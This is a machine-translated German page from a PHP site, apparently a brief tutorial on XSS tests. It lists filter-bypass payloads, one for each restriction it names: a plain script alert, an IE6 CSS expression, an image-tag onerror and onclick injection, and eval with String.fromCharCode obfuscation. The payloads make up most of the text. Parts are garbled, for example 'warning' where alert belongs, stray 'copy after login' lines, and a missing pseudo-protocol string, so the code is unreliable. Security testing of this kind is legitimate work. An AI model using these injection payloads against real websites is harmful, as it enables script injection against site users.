Heim Betrieb und Instandhaltung Sicherheit Wie wird der kleine Test von xss durchgeführt?

Wie wird der kleine Test von xss durchgeführt?

May 19, 2023 am 11:37 AM
xss

  • Keine Sicherheitseinschränkungen, direkt verwenden

<script>alert(/xss/);</ script>

  • Einschränkungen: Es kann nur CSS verwendet werden, HTML-Tags sind nicht erlaubt

Das wissen wir mit Expression kann zum Erstellen von XSS verwendet werden, kann jedoch nur unter IE getestet werden. Führen Sie daher bitte den folgenden Test in IE6 durch.

body {
black;
xss:alert(/xss/));/*IE6下测试*/
}
Nach dem Login kopieren
  • Einschränkungen: HTML ist maskiert und das Image-Tag ist verfügbar .

Die im Test eingegebenen Zeichen werden in die Quelladresse eingefügt, sodass Sie sie mit einem Pseudoprotokoll umgehen können.

Geben Sie

alert( /xss/);
Nach dem Login kopieren

direkt ein. Oder Sie können Ereignisse zum Umgehen verwenden. Achten Sie einfach auf die Schlusserklärung wie folgt:

1" onerror= warning (/xss/); var a="1

  • Einschränkung: Es wird eine Schlüsselwortfilterung verwendet.

Ich habe es getestet, das meiste davon ist gefiltert, einige sind nicht gefiltert, nach dem Testen wurde Skript/Onerror gefiltert, aber onclick wurde nicht gefiltert, verwenden Sie das onclick-Ereignis, um es zu umgehen

&lt;img src=# onclick=alert(/xss/);&gt;
Nach dem Login kopieren
  • Einschränkungen: Verwenden Sie Schrägstriche, um die charakteristischen Zeichen zu maskieren.

Das heißt, unsere charakteristischen Zeichen B. einfache und doppelte Anführungszeichen, dürfen in XSS-Anweisungen nicht vorkommen.

Verwenden Sie

&lt;script&gt;alert(/xss/);&lt;/script&gt;
Nach dem Login kopieren

direkt, um

zu umgehen, oder verwenden Sie die String.fromCharCode-Methode wie folgt:

&lt;script&gt;eval(String.fromCharCode(97,108,101,114,116,40,47,120,47,41,59));&lt;/script&gt;
Nach dem Login kopieren

Das obige ist der detaillierte Inhalt vonWie wird der kleine Test von xss durchgeführt?. Für weitere Informationen folgen Sie bitte anderen verwandten Artikeln auf der PHP chinesischen Website!

Erklärung dieser Website
Der Inhalt dieses Artikels wird freiwillig von Internetnutzern beigesteuert und das Urheberrecht liegt beim ursprünglichen Autor. Diese Website übernimmt keine entsprechende rechtliche Verantwortung. Wenn Sie Inhalte finden, bei denen der Verdacht eines Plagiats oder einer Rechtsverletzung besteht, wenden Sie sich bitte an admin@php.cn

Heiße Artikel -Tags

Notepad++7.3.1

Notepad++7.3.1

Einfach zu bedienender und kostenloser Code-Editor

SublimeText3 chinesische Version

SublimeText3 chinesische Version

Chinesische Version, sehr einfach zu bedienen

Senden Sie Studio 13.0.1

Senden Sie Studio 13.0.1

Leistungsstarke integrierte PHP-Entwicklungsumgebung

Dreamweaver CS6

Dreamweaver CS6

Visuelle Webentwicklungstools

SublimeText3 Mac-Version

SublimeText3 Mac-Version

Codebearbeitungssoftware auf Gottesniveau (SublimeText3)

Schutz vor Cross-Site-Scripting (XSS) und Cross-Site-Request-Forgery (CSRF) in Laravel Schutz vor Cross-Site-Scripting (XSS) und Cross-Site-Request-Forgery (CSRF) in Laravel Aug 13, 2023 pm 04:43 PM

Schutz vor Cross-Site-Scripting (XSS) und Cross-Site-Request-Forgery (CSRF) in Laravel

Wie man sich in PHP gegen XSS- und Remote-Codeausführungsangriffe verteidigt Wie man sich in PHP gegen XSS- und Remote-Codeausführungsangriffe verteidigt Jun 30, 2023 am 08:04 AM

Wie man sich in PHP gegen XSS- und Remote-Codeausführungsangriffe verteidigt

Analyse der sicheren XSS-Filtertechnologie in PHP Analyse der sicheren XSS-Filtertechnologie in PHP Jun 29, 2023 am 09:49 AM

Analyse der sicheren XSS-Filtertechnologie in PHP

XSS-Angriffe in PHP XSS-Angriffe in PHP May 23, 2023 am 09:10 AM

XSS-Angriffe in PHP

Best Practices für die Sicherheit für die PHP- und Vue.js-Entwicklung: XSS-Angriffe verhindern Best Practices für die Sicherheit für die PHP- und Vue.js-Entwicklung: XSS-Angriffe verhindern Jul 06, 2023 pm 01:37 PM

Best Practices für die Sicherheit für die PHP- und Vue.js-Entwicklung: XSS-Angriffe verhindern

So analysieren Sie reflektiertes XSS So analysieren Sie reflektiertes XSS Jun 03, 2023 pm 12:09 PM

So analysieren Sie reflektiertes XSS

Häufige XSS-Angriffe und Lösungen in Vue Häufige XSS-Angriffe und Lösungen in Vue Jun 10, 2023 pm 02:28 PM

Häufige XSS-Angriffe und Lösungen in Vue

Ein Leitfaden für Anfänger zu PHP: Cross-Site-Scripting-Angriffe (XSS) Ein Leitfaden für Anfänger zu PHP: Cross-Site-Scripting-Angriffe (XSS) May 21, 2023 am 10:51 AM

Ein Leitfaden für Anfänger zu PHP: Cross-Site-Scripting-Angriffe (XSS)

See all articles